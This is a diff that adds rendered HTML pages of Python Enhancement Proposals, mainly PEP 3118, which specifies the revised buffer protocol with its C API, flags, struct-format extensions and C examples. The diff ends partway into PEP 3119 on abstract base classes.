  5. There is no way for a consumer to tell the buffer-API-exporting +object it is “finished” with its view of the memory and +therefore no way for the exporting object to be sure that it is +safe to reallocate the pointer to the memory that it owns (for +example, the array object reallocating its memory after sharing +it with the buffer object which held the original pointer led +to the infamous buffer-object problem).
  6. +
  7. Memory is just a pointer with a length. There is no way to +describe what is “in” the memory (float, int, C-structure, etc.)
  8. +
  9. There is no shape information provided for the memory. But, +several array-like Python types could make use of a standard +way to describe the shape-interpretation of the memory +(wxPython, GTK, pyQT, CVXOPT, PyVox, Audio and Video +Libraries, ctypes, NumPy, data-base interfaces, etc.)
  10. +
  11. There is no way to share discontiguous memory (except through +the sequence of segments notion).

    There are two widely used libraries that use the concept of +discontiguous memory: PIL and NumPy. Their view of discontiguous +arrays is different, though. The proposed buffer interface allows +sharing of either memory model. Exporters will typically use only one +approach and consumers may choose to support discontiguous +arrays of each type however they choose.

    +

    NumPy uses the notion of constant striding in each dimension as its +basic concept of an array. With this concept, a simple sub-region +of a larger array can be described without copying the data. +Thus, stride information is the additional information that must be +shared.

    +

    The PIL uses a more opaque memory representation. Sometimes an +image is contained in a contiguous segment of memory, but sometimes +it is contained in an array of pointers to the contiguous segments +(usually lines) of the image. The PIL is where the idea of multiple +buffer segments in the original buffer interface came from.

    +

    NumPy’s strided memory model is used more often in computational +libraries and because it is so simple it makes sense to support +memory sharing using this model. The PIL memory model is sometimes +used in C-code where a 2-d array can then be accessed using double +pointer indirection: e.g. image[i][j].

    +

    The buffer interface should allow the object to export either of these +memory models. Consumers are free to either require contiguous memory +or write code to handle one or both of these memory models.

    +
  12. +
+
+
+

Proposal Overview

+
    +
  • Eliminate the char-buffer and multiple-segment sections of the +buffer-protocol.
  • +
  • Unify the read/write versions of getting the buffer.
  • +
  • Add a new function to the interface that should be called when +the consumer object is “done” with the memory area.
  • +
  • Add a new variable to allow the interface to describe what is in +memory (unifying what is currently done now in struct and +array)
  • +
  • Add a new variable to allow the protocol to share shape information
  • +
  • Add a new variable for sharing stride information
  • +
  • Add a new mechanism for sharing arrays that must +be accessed using pointer indirection.
  • +
  • Fix all objects in the core and the standard library to conform +to the new interface
  • +
  • Extend the struct module to handle more format specifiers
  • +
  • Extend the buffer object into a new memory object which places +a Python veneer around the buffer interface.
  • +
  • Add a few functions to make it easy to copy contiguous data +in and out of object supporting the buffer interface.
  • +
+
+
+

Specification

+

While the new specification allows for complicated memory sharing, +simple contiguous buffers of bytes can still be obtained from an +object. In fact, the new protocol allows a standard mechanism for +doing this even if the original object is not represented as a +contiguous chunk of memory.

+

The easiest way to obtain a simple contiguous chunk of memory is +to use the provided C-API to obtain a chunk of memory.

+

Change the PyBufferProcs structure to

+
typedef struct {
+     getbufferproc bf_getbuffer;
+     releasebufferproc bf_releasebuffer;
+} PyBufferProcs;
+
+
+

Both of these routines are optional for a type object

+
typedef int (*getbufferproc)(PyObject *obj, PyBuffer *view, int flags)
+
+
+

This function returns 0 on success and -1 on failure (and raises an +error). The first variable is the “exporting” object. The second +argument is the address to a bufferinfo structure. Both arguments must +never be NULL.

+

The third argument indicates what kind of buffer the consumer is +prepared to deal with and therefore what kind of buffer the exporter +is allowed to return. The new buffer interface allows for much more +complicated memory sharing possibilities. Some consumers may not be +able to handle all the complexity but may want to see if the +exporter will let them take a simpler view to its memory.

+

In addition, some exporters may not be able to share memory in every +possible way and may need to raise errors to signal to some consumers +that something is just not possible. These errors should be +PyErr_BufferError unless there is another error that is actually +causing the problem. The exporter can use flags information to +simplify how much of the PyBuffer structure is filled in with +non-default values and/or raise an error if the object can’t support a +simpler view of its memory.

+

The exporter should always fill in all elements of the buffer +structure (with defaults or NULLs if nothing else is requested). The +PyBuffer_FillInfo function can be used for simple cases.

+
+

Access flags

+

Some flags are useful for requesting a specific kind of memory +segment, while others indicate to the exporter what kind of +information the consumer can deal with. If certain information is not +asked for by the consumer, but the exporter cannot share its memory +without that information, then a PyErr_BufferError should be raised.

+

PyBUF_SIMPLE

+
+
This is the default flag state (0). The returned buffer may or may +not have writable memory. The format will be assumed to be +unsigned bytes. This is a “stand-alone” flag constant. It never +needs to be |’d to the others. The exporter will raise an error if +it cannot provide such a contiguous buffer of bytes.
+

PyBUF_WRITABLE

+
+
The returned buffer must be writable. If it is not writable, +then raise an error.
+

PyBUF_FORMAT

+
+
The returned buffer must have true format information if this flag +is provided. This would be used when the consumer is going to be +checking for what ‘kind’ of data is actually stored. An exporter +should always be able to provide this information if requested. If +format is not explicitly requested then the format must be returned +as NULL (which means “B”, or unsigned bytes)
+

PyBUF_ND

+
+
The returned buffer must provide shape information. The memory will +be assumed C-style contiguous (last dimension varies the fastest). +The exporter may raise an error if it cannot provide this kind of +contiguous buffer. If this is not given then shape will be NULL.
+

PyBUF_STRIDES (implies PyBUF_ND)

+
+
The returned buffer must provide strides information (i.e. the +strides cannot be NULL). This would be used when the consumer can +handle strided, discontiguous arrays. Handling strides +automatically assumes you can handle shape. The exporter may raise +an error if it cannot provide a strided-only representation of the +data (i.e. without the suboffsets).
+
+
PyBUF_C_CONTIGUOUS
+
PyBUF_F_CONTIGUOUS
+
PyBUF_ANY_CONTIGUOUS
+
+
+
These flags indicate that the returned buffer must be respectively, +C-contiguous (last dimension varies the fastest), Fortran +contiguous (first dimension varies the fastest) or either one. +All of these flags imply PyBUF_STRIDES and guarantee that the +strides buffer info structure will be filled in correctly.
+

PyBUF_INDIRECT (implies PyBUF_STRIDES)

+
+
The returned buffer must have suboffsets information (which can be +NULL if no suboffsets are needed). This would be used when the +consumer can handle indirect array referencing implied by these +suboffsets.
+

Specialized combinations of flags for specific kinds of memory sharing.

+
+
Multi-dimensional (but contiguous)
+
+
PyBUF_CONTIG (PyBUF_ND | PyBUF_WRITABLE)
+
PyBUF_CONTIG_RO (PyBUF_ND)
+
+
+

Multi-dimensional using strides but aligned

+
+
+
PyBUF_STRIDED (PyBUF_STRIDES | PyBUF_WRITABLE)
+
PyBUF_STRIDED_RO (PyBUF_STRIDES)
+
+
+

Multi-dimensional using strides and not necessarily aligned

+
+
+
PyBUF_RECORDS (PyBUF_STRIDES | PyBUF_WRITABLE | PyBUF_FORMAT)
+
PyBUF_RECORDS_RO (PyBUF_STRIDES | PyBUF_FORMAT)
+
+
+

Multi-dimensional using sub-offsets

+
+
+
PyBUF_FULL (PyBUF_INDIRECT | PyBUF_WRITABLE | PyBUF_FORMAT)
+
PyBUF_FULL_RO (PyBUF_INDIRECT | PyBUF_FORMAT)
+
+
+
+

Thus, the consumer simply wanting a contiguous chunk of bytes from +the object would use PyBUF_SIMPLE, while a consumer that understands +how to make use of the most complicated cases could use PyBUF_FULL.

+

The format information is only guaranteed to be non-NULL if +PyBUF_FORMAT is in the flag argument, otherwise it is expected the +consumer will assume unsigned bytes.

+

There is a C-API that simple exporting objects can use to fill in the +buffer info structure correctly according to the provided flags if a +contiguous chunk of “unsigned bytes” is all that can be exported.

+
+
+

The Py_buffer struct

+

The bufferinfo structure is:

+
struct bufferinfo {
+     void *buf;
+     Py_ssize_t len;
+     int readonly;
+     const char *format;
+     int ndim;
+     Py_ssize_t *shape;
+     Py_ssize_t *strides;
+     Py_ssize_t *suboffsets;
+     Py_ssize_t itemsize;
+     void *internal;
+} Py_buffer;
+
+
+

Before calling the bf_getbuffer function, the bufferinfo structure can +be filled with whatever, but the buf field must be NULL when +requesting a new buffer. Upon return from bf_getbuffer, the +bufferinfo structure is filled in with relevant information about the +buffer. This same bufferinfo structure must be passed to +bf_releasebuffer (if available) when the consumer is done with the +memory. The caller is responsible for keeping a reference to obj until +releasebuffer is called (i.e. the call to bf_getbuffer does not alter +the reference count of obj).

+

The members of the bufferinfo structure are:

+
+
buf
a pointer to the start of the memory for the object
+
len
the total bytes of memory the object uses. This should be the +same as the product of the shape array multiplied by the number of +bytes per item of memory.
+
readonly
an integer variable to hold whether or not the memory is readonly. +1 means the memory is readonly, zero means the memory is writable.
+
format
a NULL-terminated format-string (following the struct-style syntax +including extensions) indicating what is in each element of +memory. The number of elements is len / itemsize, where itemsize +is the number of bytes implied by the format. This can be NULL which +implies standard unsigned bytes (“B”).
+
ndim
a variable storing the number of dimensions the memory represents. +Must be >=0. A value of 0 means that shape and strides and suboffsets +must be NULL (i.e. the memory represents a scalar).
+
shape
an array of Py_ssize_t of length ndims indicating the +shape of the memory as an N-D array. Note that ((*shape)[0] * +... * (*shape)[ndims-1])*itemsize = len. If ndims is 0 (indicating +a scalar), then this must be NULL.
+
strides
address of a Py_ssize_t* variable that will be filled with a +pointer to an array of Py_ssize_t of length ndims (or NULL +if ndims is 0), indicating the number of bytes to skip to get to +the next element in each dimension. If this is not requested by +the caller (PyBUF_STRIDES is not set), then this should be set +to NULL, which indicates a C-style contiguous array, or a +PyExc_BufferError raised if this is not possible.
+
suboffsets
address of a Py_ssize_t * variable that will be filled with a +pointer to an array of Py_ssize_t of length *ndims. If +these suboffset numbers are >=0, then the value stored along the +indicated dimension is a pointer and the suboffset value dictates +how many bytes to add to the pointer after de-referencing. A +suboffset value that is negative indicates that no de-referencing +should occur (striding in a contiguous memory block). If all +suboffsets are negative (i.e. no de-referencing is needed), then +this must be NULL (the default value). If this is not requested +by the caller (PyBUF_INDIRECT is not set), then this should be +set to NULL or a PyExc_BufferError raised if this is not possible.

For clarity, here is a function that returns a pointer to the +element in an N-D array pointed to by an N-dimensional index when +there are both non-NULL strides and suboffsets:

+
void *get_item_pointer(int ndim, void *buf, Py_ssize_t *strides,
+                       Py_ssize_t *suboffsets, Py_ssize_t *indices) {
+    char *pointer = (char*)buf;
+    int i;
+    for (i = 0; i < ndim; i++) {
+        pointer += strides[i] * indices[i];
+        if (suboffsets[i] >= 0) {
+            pointer = *((char**)pointer) + suboffsets[i];
+        }
+    }
+    return (void*)pointer;
+}
+
+
+

Notice the suboffset is added “after” the dereferencing occurs. +Thus slicing in the ith dimension would add to the suboffsets in +the (i-1)st dimension. Slicing in the first dimension would change +the location of the starting pointer directly (i.e. buf would +be modified). A Python sketch of this offset arithmetic follows this +member list.

+
+
itemsize
This is a storage for the itemsize (in bytes) of each element of the shared +memory. It is technically unnecessary, as it can be obtained using +PyBuffer_SizeFromFormat; however, an exporter may know this +information without parsing the format string, and it is necessary +to know the itemsize for proper interpretation of striding. +Therefore, storing it is more convenient and faster.
+
internal
This is for use internally by the exporting object. For example, +this might be re-cast as an integer by the exporter and used to +store flags about whether or not the shape, strides, and suboffsets +arrays must be freed when the buffer is released. The consumer +should never alter this value.
+
+
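As a hedged Python analogue of get_item_pointer above (item_offset and deref are invented names; plain Python cannot follow a stored C pointer, so deref stands in as a hypothetical callback):

def item_offset(ndim, strides, suboffsets, indices, deref=None):
    """Walk an N-D index through strides and optional suboffsets."""
    offset = 0
    for i in range(ndim):
        offset += strides[i] * indices[i]
        if suboffsets is not None and suboffsets[i] >= 0:
            # A real consumer would dereference a stored pointer here.
            offset = deref(offset) + suboffsets[i]
    return offset

# With all suboffsets negative (or absent) this is plain strided addressing:
# a C-contiguous 3x4 array of 1-byte items has strides (4, 1), so
# index (2, 3) lands at byte offset 2*4 + 3*1 == 11.
assert item_offset(2, (4, 1), None, (2, 3)) == 11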

The exporter is responsible for making sure that any memory pointed to +by buf, format, shape, strides, and suboffsets is valid until +releasebuffer is called. If the exporter wants to be able to change +an object’s shape, strides, and/or suboffsets before releasebuffer is +called then it should allocate those arrays when getbuffer is called +(pointing to them in the buffer-info structure provided) and free them +when releasebuffer is called.

+
+
+

Releasing the buffer

+

The same bufferinfo struct should be used in the release-buffer +interface call. The caller is responsible for the memory of the +Py_buffer structure itself.

+
typedef void (*releasebufferproc)(PyObject *obj, Py_buffer *view)
+
+
+

Callers of getbufferproc must make sure that this function is called +when memory previously acquired from the object is no longer needed. +The exporter of the interface must make sure that any memory pointed +to in the bufferinfo structure remains valid until releasebuffer is +called.

+

If the bf_releasebuffer function is not provided (i.e. it is NULL), +then it does not ever need to be called.

+

Exporters will need to define a bf_releasebuffer function if they can +re-allocate their memory, strides, shape, suboffsets, or format +variables which they might share through the struct bufferinfo. +Several mechanisms could be used to keep track of how many getbuffer +calls have been made and shared. Either a single variable could be +used to keep track of how many “views” have been exported, or a +linked-list of bufferinfo structures filled in could be maintained in +each object.

+

All that is specifically required by the exporter, however, is to +ensure that any memory shared through the bufferinfo structure remains +valid until releasebuffer is called on the bufferinfo structure +exporting that memory.

+
+
+
+

New C-API calls are proposed

+
int PyObject_CheckBuffer(PyObject *obj)
+
+
+

Return 1 if the getbuffer function is available otherwise 0.

+
int PyObject_GetBuffer(PyObject *obj, Py_buffer *view,
+                       int flags)
+
+
+

This is a C-API version of the getbuffer function call. It checks to +make sure object has the required function pointer and issues the +call. Returns -1 and raises an error on failure and returns 0 on +success.

+
void PyBuffer_Release(PyObject *obj, Py_buffer *view)
+
+
+

This is a C-API version of the releasebuffer function call. It checks +to make sure the object has the required function pointer and issues +the call. This function always succeeds even if there is no releasebuffer +function for the object.

+
PyObject *PyObject_GetMemoryView(PyObject *obj)
+
+
+

Return a memory-view object from an object that defines the buffer interface.
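At the Python level this corresponds to calling memoryview() on the object; a brief sketch, using the built-in behavior as it exists today:
memoryview(b"abc")        # works: bytes exports the buffer interface
+try:
+    memoryview(3.14)      # floats do not export the buffer interface
+except TypeError:
+    pass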

+

A memory-view object is an extended buffer object that could replace +the buffer object (but doesn’t have to as that could be kept as a +simple 1-d memory-view object). Its C-structure is

+
typedef struct {
+    PyObject_HEAD
+    PyObject *base;
+    Py_buffer view;
+} PyMemoryViewObject;
+
+
+

This is functionally similar to the current buffer object except a +reference to base is kept and the memory view is not re-grabbed. +Thus, this memory view object holds on to the memory of base until it +is deleted.

+

This memory-view object will support multi-dimensional slicing and be +the first object provided with Python to do so. Slices of the +memory-view object are other memory-view objects with the same base +but with a different view of the base object.
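A short sketch of that slicing behavior, observable with today's memoryview:
buf = bytearray(b"abcdef")
+m = memoryview(buf)
+s = m[2:4]                # a new view over the same base memory
+s[0] = ord("X")
+assert buf == b"abXdef"   # the change is visible via the base object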

+

When an “element” from the memory-view is returned it is always a +bytes object whose format should be interpreted by the format +attribute of the memoryview object. The struct module can be used to +“decode” the bytes in Python if desired. Or the contents can be +passed to a NumPy array or other object consuming the buffer protocol.
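For instance, element bytes can be decoded with the struct module along these lines (a sketch; the exporter's format string is assumed here to be 'd'):
import struct
+
+raw = struct.pack("3d", 1.0, 2.0, 3.0)
+view = memoryview(raw)
+itemsize = struct.calcsize("d")
+first, = struct.unpack("d", view[:itemsize].tobytes())
+assert first == 1.0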

+

The Python name will be

+

__builtin__.memoryview

+

Methods:

+
+
__getitem__ (will support multi-dimensional slicing)
+
__setitem__ (will support multi-dimensional slicing)
+
tobytes (obtain a new bytes-object of a copy of the memory).
+
tolist (obtain a “nested” list of the memory. Everything +is interpreted into standard Python objects +as the struct module unpack would do – in fact +it uses struct.unpack to accomplish it).
+
+

Attributes (taken from the memory of the base object):

+
  • format
  • itemsize
  • shape
  • strides
  • suboffsets
  • readonly
  • ndim
+
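These attributes are observable from Python on today's memoryview, for example:
import array
+
+m = memoryview(array.array("d", [1.0, 2.0, 3.0]))
+print(m.format, m.itemsize, m.ndim)       # d 8 1
+print(m.shape, m.strides, m.readonly)     # (3,) (8,) False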
Py_ssize_t PyBuffer_SizeFromFormat(const char *)
+
+
+

Return the implied itemsize of the data-format area from a struct-style +description.

+
PyObject * PyMemoryView_GetContiguous(PyObject *obj,  int buffertype,
+                                      char fortran)
+
+
+

Return a memoryview object to a contiguous chunk of memory represented +by obj. If a copy must be made (because the memory pointed to by obj +is not contiguous), then a new bytes object will be created and become +the base object for the returned memory view object.

+

The buffertype argument can be PyBUF_READ, PyBUF_WRITE, +PyBUF_UPDATEIFCOPY to determine whether the returned buffer should be +readable, writable, or set to update the original buffer if a copy +must be made. If buffertype is PyBUF_WRITE and the buffer is not +contiguous an error will be raised. In this circumstance, the user +can use PyBUF_UPDATEIFCOPY to ensure that a writable temporary +contiguous buffer is returned. The contents of this contiguous buffer +will be copied back into the original object after the memoryview +object is deleted as long as the original object is writable. If this +is not allowed by the original object, then a BufferError is raised.

+

If the object is multi-dimensional, then if fortran is ‘F’, the first +dimension of the underlying array will vary the fastest in the buffer. +If fortran is ‘C’, then the last dimension will vary the fastest +(C-style contiguous). If fortran is ‘A’, then it does not matter and +you will get whatever the object decides is more efficient. If a copy +is made, then the memory must be freed by calling PyMem_Free.

+

You receive a new reference to the memoryview object.

+
int PyObject_CopyToObject(PyObject *obj, void *buf, Py_ssize_t len,
+                          char fortran)
+
+
+

Copy len bytes of data pointed to by the contiguous chunk of +memory pointed to by buf into the buffer exported by obj. Return +0 on success and return -1 and raise an error on failure. If the +object does not have a writable buffer, then an error is raised. If +fortran is ‘F’, then if the object is multi-dimensional, then the data +will be copied into the array in Fortran-style (first dimension varies +the fastest). If fortran is ‘C’, then the data will be copied into +the array in C-style (last dimension varies the fastest). If fortran +is ‘A’, then it does not matter and the copy will be made in whatever +way is more efficient.

+
int PyObject_CopyData(PyObject *dest, PyObject *src)
+
+
+

These last three C-API calls allow a standard way of getting data in and +out of Python objects into contiguous memory areas no matter how it is +actually stored. These calls use the extended buffer interface to perform +their work.

+
int PyBuffer_IsContiguous(Py_buffer *view, char fortran)
+
+
+

Return 1 if the memory defined by the view object is C-style +(fortran = ‘C’) or Fortran-style (fortran = ‘F’) contiguous, or either one +(fortran = ‘A’). Return 0 otherwise.

+
void PyBuffer_FillContiguousStrides(int ndim, Py_ssize_t *shape,
+                                    Py_ssize_t *strides, Py_ssize_t itemsize,
+                                    char fortran)
+
+
+

Fill the strides array with the byte-strides of a contiguous (C-style if +fortran is ‘C’, Fortran-style if fortran is ‘F’) array of the given +shape with the given number of bytes per element.
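A Python model of what this helper computes (a sketch; the C function fills a caller-provided strides array rather than returning a list):
def contiguous_strides(shape, itemsize, fortran):
+    # Byte strides for a contiguous array: 'C' makes the last
+    # dimension vary fastest, 'F' the first.
+    strides = [0] * len(shape)
+    sd = itemsize
+    dims = range(len(shape) - 1, -1, -1) if fortran == 'C' else range(len(shape))
+    for i in dims:
+        strides[i] = sd
+        sd *= shape[i]
+    return strides
+
+assert contiguous_strides((16, 4), 8, 'C') == [32, 8]
+assert contiguous_strides((16, 4), 8, 'F') == [8, 128]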

+
int PyBuffer_FillInfo(Py_buffer *view, void *buf,
+                      Py_ssize_t len, int readonly, int infoflags)
+
+
+

Fills in a buffer-info structure correctly for an exporter that can +only share a contiguous chunk of memory of “unsigned bytes” of the +given length. Returns 0 on success and -1 (raising an error) on +failure.

+
PyExc_BufferError
+
+
+

A new error object for returning buffer errors which arise because an +exporter cannot provide the kind of buffer that a consumer expects. +This will also be raised when a consumer requests a buffer from an +object that does not provide the protocol.

+
+
+

Additions to the struct string-syntax

+

The struct string-syntax is missing some characters to fully +implement data-format descriptions already available elsewhere (in +ctypes and NumPy for example). The Python 2.5 specification is +at http://docs.python.org/library/struct.html.

+

Here are the proposed additions:

Character        Description
‘t’              bit (number before states how many bits)
‘?’              platform _Bool type
‘g’              long double
‘c’              ucs-1 (latin-1) encoding
‘u’              ucs-2
‘w’              ucs-4
‘O’              pointer to Python Object
‘Z’              complex (whatever the next specifier is)
‘&’              specific pointer (prefix before another character)
‘(k1,k2,…,kn)’   multi-dimensional array of whatever follows
‘:name:’         optional name of the preceding element
‘T{}’            structure (detailed layout inside {})
‘X{}’            pointer to a function (optional function signature
                 inside {} with any return value preceded by -> and
                 placed at the end)
+

The struct module will be changed to understand these as well and +return appropriate Python objects on unpacking. Unpacking a +long-double will return a decimal object or a ctypes long-double. +Unpacking ‘u’ or ‘w’ will return Python unicode. Unpacking a +multi-dimensional array will return a list (of lists if >1d). +Unpacking a pointer will return a ctypes pointer object. Unpacking a +function pointer will return a ctypes call-object (perhaps). Unpacking +a bit will return a Python Bool. White-space in the struct-string +syntax will be ignored if it isn’t already. Unpacking a named-object +will return some kind of named-tuple-like object that acts like a +tuple but whose entries can also be accessed by name. Unpacking a +nested structure will return a nested tuple.

+

Endian-specification (‘!’, ‘@’, ‘=’, ‘>’, ‘<’, ‘^’) is also allowed +inside the string so that it can change if needed. The +previously-specified endian string is in force until changed. The +default endian is ‘@’, which means native data-types and alignment. If +unaligned native data-types are requested, then the endian +specification is ‘^’.

+

According to the struct-module, a number can precede a character +code to specify how many of that type there are. The +(k1,k2,...,kn) extension also allows specifying if the data is +supposed to be viewed as a (C-style contiguous, last-dimension +varies the fastest) multi-dimensional array of a particular format.
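The count-prefix behavior is unchanged from the struct module that ships today:
import struct
+
+# '3B' is equivalent to 'BBB': three consecutive unsigned bytes.
+assert struct.unpack("3B", b"\x01\x02\x03") == (1, 2, 3)
+assert struct.calcsize("3B") == struct.calcsize("BBB")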

+

Functions should be added to ctypes to create a ctypes object from +a struct description, and long-double and ucs-2 types should be added +to ctypes.

+
+
+

Examples of Data-Format Descriptions

+

Here are some examples of C-structures and how they would be +represented using the struct-style syntax.

+

<named> is the constructor for a named-tuple (not-specified yet).

+
+
float
'd' <–> Python float
+
complex double
'Zd' <–> Python complex
+
RGB Pixel data
'BBB' <–> (int, int, int) +'B:r: B:g: B:b:' <–> <named>((int, int, int), (‘r’,’g’,’b’))
+
Mixed endian (weird but possible)
'>i:big: <i:little:' <–> <named>((int, int), (‘big’, ‘little’))
+
Nested structure
struct {
+     int ival;
+     struct {
+         unsigned short sval;
+         unsigned char bval;
+         unsigned char cval;
+     } sub;
+}
+"""i:ival:
+   T{
+      H:sval:
+      B:bval:
+      B:cval:
+    }:sub:
+"""
+
+
+
+
Nested array
struct {
+     int ival;
+     double data[16*4];
+}
+"""i:ival:
+   (16,4)d:data:
+"""
+
+
+
+
+

Note that in the last example, the C-structure compared against is +intentionally a 1-d array and not a 2-d array data[16][4]. The reason +for this is to avoid confusion between static multi-dimensional +arrays in C (which are laid out contiguously) and dynamic +multi-dimensional arrays, which use the same syntax to access elements, +data[0][1], but whose memory is not necessarily contiguous. The +struct-syntax always uses contiguous memory and the +multi-dimensional character is information about the memory to be +communicated by the exporter.

+

In other words, the struct-syntax description does not have to match +the C-syntax exactly as long as it describes the same memory layout. +The fact that a C-compiler would think of the memory as a 1-d array of +doubles is irrelevant to the fact that the exporter wanted to +communicate to the consumer that this field of the memory should be +thought of as a 2-d array where a new dimension is considered after +every 4 elements.
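In today's struct syntax the field would simply be written '64d'; the proposed '(16,4)d' describes the identical 512 contiguous bytes:
import struct
+
+# data[16*4]: 64 doubles of 8 bytes each, laid out contiguously.
+assert struct.calcsize("64d") == 16 * 4 * 8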

+
+
+

Code to be affected

+

All objects and modules in Python that export or consume the old +buffer interface will be modified. Here is a partial list.

+
  • buffer object
  • bytes object
  • string object
  • unicode object
  • array module
  • struct module
  • mmap module
  • ctypes module
+

Anything else using the buffer API.

+
+
+

Issues and Details

+

It is intended that this PEP will be back-ported to Python 2.6 by +adding the C-API and the two functions to the existing buffer +protocol.

+

Previous versions of this PEP proposed a read/write locking scheme, +but it was later perceived as a) too complicated for common simple use +cases that do not require any locking and b) too simple for use cases +that required concurrent read/write access to a buffer with changing, +short-living locks. It is therefore left to users to implement their +own specific locking scheme around buffer objects if they require +consistent views across concurrent read/write access. A future PEP +may be proposed which includes a separate locking API after some +experience with these user-schemes is obtained.

+

The sharing of strided memory and suboffsets is new and can be seen as +a modification of the multiple-segment interface. It is motivated by +NumPy and the PIL. NumPy objects should be able to share their +strided memory with code that understands how to manage strided memory +because strided memory is very common when interfacing with compute +libraries.

+

Also, with this approach it should be possible to write generic code +that works with both kinds of memory without copying.

+

Memory management of the format string, the shape array, the strides +array, and the suboffsets array in the bufferinfo structure is always +the responsibility of the exporting object. The consumer should not +set these pointers to any other memory or try to free them.

+

Several ideas were discussed and rejected:

+
+
Having a “releaser” object whose release-buffer was called. This +was deemed unacceptable because it caused the protocol to be +asymmetric (you called release on something different than you +“got” the buffer from). It also complicated the protocol without +providing a real benefit.

Passing all the struct variables separately into the function. +This had the advantage that it allowed one to set NULL to +variables that were not of interest, but it also made the function +call more difficult. The flags variable allows the same +ability of consumers to be “simple” in how they call the protocol.

+
+
+
+

Code

+

The authors of the PEP promise to contribute and maintain the code for +this proposal but will welcome any help.

+
+
+

Examples

+
+

Ex. 1

+

This example shows how an image object that uses contiguous lines might expose its buffer:

+
struct rgba {
+    unsigned char r, g, b, a;
+};
+
+struct ImageObject {
+    PyObject_HEAD;
+    ...
+    struct rgba** lines;
+    Py_ssize_t height;
+    Py_ssize_t width;
+    Py_ssize_t shape_array[2];
+    Py_ssize_t stride_array[2];
+    Py_ssize_t view_count;
+};
+
+
+

“lines” points to a malloced 1-D array of (struct rgba*). Each pointer +in THAT block points to a separately malloced array of (struct rgba).

+

In order to access, say, the red value of the pixel at x=30, y=50, you’d use “lines[50][30].r”.

+

So what does ImageObject’s getbuffer do? Leaving error checking out:

+
int Image_getbuffer(PyObject *obj, Py_buffer *view, int flags) {
+
+    static Py_ssize_t suboffsets[2] = { 0, -1 };
+    struct ImageObject *self = (struct ImageObject *)obj;
+
+    view->buf = self->lines;
+    view->len = self->height * self->width * sizeof(struct rgba);
+    view->readonly = 0;
+    view->ndim = 2;
+    self->shape_array[0] = self->height;
+    self->shape_array[1] = self->width;
+    view->shape = self->shape_array;
+    /* stride over the row-pointer array in the first dimension;
+       the suboffset of 0 then dereferences each row pointer */
+    self->stride_array[0] = sizeof(struct rgba *);
+    self->stride_array[1] = sizeof(struct rgba);
+    view->strides = self->stride_array;
+    view->suboffsets = suboffsets;
+
+    self->view_count++;
+
+    return 0;
+}
+
+
+void Image_releasebuffer(PyObject *obj, Py_buffer *view) {
+    ((struct ImageObject *)obj)->view_count--;
+}
+
+
+
+
+

Ex. 2

+

This example shows how an object that wants to expose a contiguous +chunk of memory (which will never be re-allocated while the object is +alive) would do that.

+
int myobject_getbuffer(PyObject *self, Py_buffer *view, int flags) {
+
+    void *buf;
+    Py_ssize_t len;
+    int readonly=0;
+
+    buf = /* Point to buffer */
+    len = /* Set to size of buffer */
+    readonly = /* Set to 1 if readonly */
+
+    return PyBuffer_FillInfo(view, buf, len, readonly, flags);
+}
+
+/* No releasebuffer is necessary because the memory will never
+   be re-allocated
+*/
+
+
+
+
+

Ex. 3

+

A consumer that wants only to get a simple contiguous chunk of bytes +from a Python object obj would do the following:

+
Py_buffer view;
+int ret;
+
+if (PyObject_GetBuffer(obj, &view, PyBUF_SIMPLE) < 0) {
+     /* error return */
+}
+
+/* Now, view.buf is the pointer to memory
+        view.len is the length
+        view.readonly is whether or not the memory is read-only.
+ */
+
+
+/* After the information is no longer needed, release the buffer;
+   PyBuffer_Release always succeeds and has no error return. */
+
+PyBuffer_Release(obj, &view);
+
+
+
+
+

Ex. 4

+

A consumer that wants to be able to use any object’s memory but is +writing an algorithm that only handles contiguous memory could do the following:

+
void *buf;
+Py_ssize_t len;
+char *format;
+int copy;
+
+copy = PyObject_GetContiguous(obj, &buf, &len, &format, 0, 'A');
+if (copy < 0) {
+   /* error return */
+}
+
+/* process memory pointed to by buf if format is correct */
+
+/* Optional:
+
+   if, after processing, we want to copy data from buffer back
+   into the object
+
+   we could do
+   */
+
+if (PyObject_CopyToObject(obj, buf, len, 'A') < 0) {
+       /*        error return */
+}
+
+/* Make sure that if a copy was made, the memory is freed */
+if (copy == 1) PyMem_Free(buf);
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3118.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3119/index.html b/pep-3119/index.html new file mode 100644 index 00000000000..0f395f1084e --- /dev/null +++ b/pep-3119/index.html @@ -0,0 +1,955 @@ + + + + + + + + PEP 3119 – Introducing Abstract Base Classes | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3119 – Introducing Abstract Base Classes

+
+
Author:
+
Guido van Rossum <guido at python.org>, Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Apr-2007, 11-May-2007
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal to add Abstract Base Class (ABC) support to Python +3000. It proposes:

+
  • A way to overload isinstance() and issubclass().
  • A new module abc which serves as an “ABC support framework”. It +defines a metaclass for use with ABCs and a decorator that can be +used to define abstract methods.
  • Specific ABCs for containers and iterators, to be added to the +collections module.
+

Much of the thinking that went into the proposal is not about the +specific mechanism of ABCs, as contrasted with Interfaces or Generic +Functions (GFs), but about clarifying philosophical issues like “what +makes a set”, “what makes a mapping” and “what makes a sequence”.

+

There’s also a companion PEP 3141, which defines ABCs for numeric +types.

+
+

Acknowledgements

+

Talin wrote the Rationale below [1] as well as most of the section on +ABCs vs. Interfaces. For that alone he deserves co-authorship. The +rest of the PEP uses “I” referring to the first author.

+
+
+
+

Rationale

+

In the domain of object-oriented programming, the usage patterns for +interacting with an object can be divided into two basic categories, +which are ‘invocation’ and ‘inspection’.

+

Invocation means interacting with an object by invoking its methods. +Usually this is combined with polymorphism, so that invoking a given +method may run different code depending on the type of an object.

+

Inspection means the ability for external code (outside of the +object’s methods) to examine the type or properties of that object, +and make decisions on how to treat that object based on that +information.

+

Both usage patterns serve the same general end, which is to be able to +support the processing of diverse and potentially novel objects in a +uniform way, but at the same time allowing processing decisions to be +customized for each different type of object.

+

In classical OOP theory, invocation is the preferred usage pattern, +and inspection is actively discouraged, being considered a relic of an +earlier, procedural programming style. However, in practice this view +is simply too dogmatic and inflexible, and leads to a kind of design +rigidity that is very much at odds with the dynamic nature of a +language like Python.

+

